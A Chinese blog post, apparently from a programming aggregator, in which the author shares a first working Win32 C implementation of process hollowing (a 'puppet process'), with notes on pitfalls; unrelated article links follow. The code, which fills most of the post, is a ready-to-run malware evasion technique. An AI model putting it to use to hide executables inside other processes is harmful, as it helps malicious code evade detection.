创建傀儡进程

2024-02-24 10:18
文章标签 创建 进程 傀儡

本文主要是介绍创建傀儡进程,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

折腾好久,总算完成了自己第一次的傀儡进程编写。
效果:使当前进程创建一个子进程(同名)
掏空 子进程,注入任何自己编写好的其他exe。

注意点
1.用来创建傀儡进程的父进程程序 需要是32位程序,因为编码的程序本身就是win32控制台程序
2.注入到进程中的程序32位,64位都行
3.pe结构取值时一定一定要留心是否需要加基址。
4.注意权限问题,以及CreateProcess API的pszCurDir参数问题。

代码

#include<stdio.h>
#include<windows.h>
#include<winbase.h>
struct _PROCESS_INFORMATION ProcessInfomation;int main()
{	LPVOID pAlloc1;LPVOID pAlloc2;HANDLE hfile;PIMAGE_NT_HEADERS pPeHeader;PIMAGE_SECTION_HEADER pSectionHeader;int lastError,ReadInfo=0;DWORD BytesRead=0;CONTEXT Context={0};Context.ContextFlags=CONTEXT_ALL;char lpName[260];/以挂起的方式创建傀儡进程,并获取进程基址STARTUPINFOA StartupInfo={0};PROCESS_INFORMATION ProcessInfomation = {0};StartupInfo.cb=sizeof(StartupInfo);GetModuleFileName(0,lpName,260);if(!CreateProcess(lpName,NULL,0,0,0,CREATE_SUSPENDED,0,0,&StartupInfo,&ProcessInfomation))//ProcessInfomation返回该进程主线程的信息 倒数第三个参数 运行环境:pszCurDir 一定要留心。{lastError=GetLastError();printf("CreateProcess fail  LastError:%d\n",lastError);};if(!GetThreadContext(ProcessInfomation.hThread,&Context)){lastError=GetLastError();printf("GetThreadContext fail LastError:%d\n",lastError);};if(!ReadProcessMemory(ProcessInfomation.hProcess,(LPCVOID)(Context.Ebx + 0x8),&ReadInfo,4,0)){lastError=GetLastError();printf("GetProcessImageBase fail LastError:%d\n",lastError);};printf("ProcessImageBase:address 0x%x\n",ReadInfo);// 把准备注入到傀儡进程的程序读进内存hfile=CreateFile("play.exe",GENERIC_READ,0,0,OPEN_EXISTING,0,0);pAlloc1=VirtualAlloc(NULL,0x70000,0x3000,4);ReadFile(hfile,pAlloc1,0x70000,&BytesRead,0);pPeHeader=(PIMAGE_NT_HEADERS)((PBYTE)pAlloc1+((PIMAGE_DOS_HEADER)pAlloc1)->e_lfanew);pSectionHeader=(IMAGE_SECTION_HEADER *)((char *)&pPeHeader->OptionalHeader + pPeHeader->FileHeader.SizeOfOptionalHeader);///向傀儡进程申请内存空间 SetLastError(0);pAlloc2=VirtualAllocEx(ProcessInfomation.hProcess,(LPVOID)pPeHeader->OptionalHeader.ImageBase,pPeHeader->OptionalHeader.SizeOfImage,0x3000,64);if(!pAlloc2){lastError=GetLastError();printf("VirtualAllocEx fail LastError:%d\n",lastError);TerminateProcess(ProcessInfomation.hProcess,0);return 0;}printf("AllocExBase: %x\n",pAlloc2);//写入PE头if(WriteProcessMemory(ProcessInfomation.hProcess,pAlloc2,pAlloc1,pPeHeader->OptionalHeader.SizeOfHeaders,0)){printf("write PeHeader Success !\n");}/写入节表,分节表写入会使得程序展开在进程中int NumofSection = pPeHeader->FileHeader.NumberOfSections;for(int i=0;i<NumofSection;i++){	LPVOID pAllocRawAddressSection=(char *)pAlloc1+pSectionHeader->PointerToRawData;LPVOID pAllocVirtualAddressSection=(char *)pPeHeader->OptionalHeader.ImageBase+pSectionHeader->VirtualAddress;if(WriteProcessMemory(ProcessInfomation.hProcess,pAllocVirtualAddressSection,pAllocRawAddressSection,pSectionHeader->SizeOfRawData,0)){printf("write the %d section success !\n",i+1);}else{lastError=GetLastError();printf("write the %d section fail ! lastError:%d\n",i+1,lastError);}pSectionHeader++;}///设置傀儡进程的进程基址0x400000if(WriteProcessMemory(ProcessInfomation.hProcess,(char *)Context.Ebx+8,&pPeHeader->OptionalHeader.ImageBase,4,0)){printf("set Process ImageBase is 0x400000  success !\n");}//设置傀儡进程的进程OEP 为注入程序的OEPContext.Eax=pPeHeader->OptionalHeader.ImageBase+pPeHeader->OptionalHeader.AddressOfEntryPoint;//设置入口点地址 一定别忘了加基址if(SetThreadContext(ProcessInfomation.hThread,&Context)){printf("set Thread Context success !\n");}//恢复线程运行if(ResumeThread(ProcessInfomation.hThread)!=(DWORD)-1){	lastError=GetLastError();printf("Resume Thread success ! \n");}system("pause");return 0;
}

编程中遇到的问题总结:

1.如果创建用来傀儡进程的程序,跟代码程序在不在同一目录时 ,CreateProcess()函数 一定要指定运行环境(pszCurDir)。
2.虽然指定了运行环境,但还是有各种各样的问题,这些问题可能都是写入程序自身的防御机制吧。但更多的可能是权限问题。

这篇关于创建傀儡进程的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/741783

相关文章

【Python编程】Linux创建虚拟环境并配置与notebook相连接

1.创建 使用 venv 创建虚拟环境。例如,在当前目录下创建一个名为 myenv 的虚拟环境: python3 -m venv myenv 2.激活 激活虚拟环境使其成为当前终端会话的活动环境。运行: source myenv/bin/activate 3.与notebook连接 在虚拟环境中,使用 pip 安装 Jupyter 和 ipykernel: pip instal

在cscode中通过maven创建java项目

在cscode中创建java项目 可以通过博客完成maven的导入 建立maven项目 使用快捷键 Ctrl + Shift + P 建立一个 Maven 项目 1 Ctrl + Shift + P 打开输入框2 输入 "> java create"3 选择 maven4 选择 No Archetype5 输入 域名6 输入项目名称7 建立一个文件目录存放项目,文件名一般为项目名8 确定

Java 创建图形用户界面(GUI)入门指南(Swing库 JFrame 类)概述

概述 基本概念 Java Swing 的架构 Java Swing 是一个为 Java 设计的 GUI 工具包,是 JAVA 基础类的一部分,基于 Java AWT 构建,提供了一系列轻量级、可定制的图形用户界面(GUI)组件。 与 AWT 相比,Swing 提供了许多比 AWT 更好的屏幕显示元素,更加灵活和可定制,具有更好的跨平台性能。 组件和容器 Java Swing 提供了许多

[Linux]:进程(下)

✨✨ 欢迎大家来到贝蒂大讲堂✨✨ 🎈🎈养成好习惯,先赞后看哦~🎈🎈 所属专栏:Linux学习 贝蒂的主页:Betty’s blog 1. 进程终止 1.1 进程退出的场景 进程退出只有以下三种情况: 代码运行完毕,结果正确。代码运行完毕,结果不正确。代码异常终止(进程崩溃)。 1.2 进程退出码 在编程中,我们通常认为main函数是代码的入口,但实际上它只是用户级

顺序表之创建,判满,插入,输出

文章目录 🍊自我介绍🍊创建一个空的顺序表,为结构体在堆区分配空间🍊插入数据🍊输出数据🍊判断顺序表是否满了,满了返回值1,否则返回0🍊main函数 你的点赞评论就是对博主最大的鼓励 当然喜欢的小伙伴可以:点赞+关注+评论+收藏(一键四连)哦~ 🍊自我介绍   Hello,大家好,我是小珑也要变强(也是小珑),我是易编程·终身成长社群的一名“创始团队·嘉宾”

Maven创建项目中的groupId, artifactId, 和 version的意思

文章目录 groupIdartifactIdversionname groupId 定义:groupId 是 Maven 项目坐标的第一个部分,它通常表示项目的组织或公司的域名反转写法。例如,如果你为公司 example.com 开发软件,groupId 可能是 com.example。作用:groupId 被用来组织和分组相关的 Maven artifacts,这样可以避免

批处理以当前时间为文件名创建文件

批处理以当前时间为文件名创建文件 批处理创建空文件 有时候,需要创建以当前时间命名的文件,手动输入当然可以,但是有更省心的方法吗? 假设我是 windows 操作系统,打开命令行。 输入以下命令试试: echo %date:~0,4%_%date:~5,2%_%date:~8,2%_%time:~0,2%_%time:~3,2%_%time:~6,2% 输出类似: 2019_06

ORACLE 11g 创建数据库时 Enterprise Manager配置失败的解决办法 无法打开OEM的解决办法

在win7 64位系统下安装oracle11g,在使用Database configuration Assistant创建数据库时,在创建到85%的时候报错,错误如下: 解决办法: 在listener.ora中增加对BlueAeri-PC或ip地址的侦听,具体步骤如下: 1.启动Net Manager,在“监听程序”--Listener下添加一个地址,主机名写计

java 进程 返回值

实现 Callable 接口 与 Runnable 相比,Callable 可以有返回值,返回值通过 FutureTask 进行封装。 public class MyCallable implements Callable<Integer> {public Integer call() {return 123;}} public static void main(String[] args

C#关闭指定时间段的Excel进程的方法

private DateTime beforeTime;            //Excel启动之前时间          private DateTime afterTime;               //Excel启动之后时间          //举例          beforeTime = DateTime.Now;          Excel.Applicat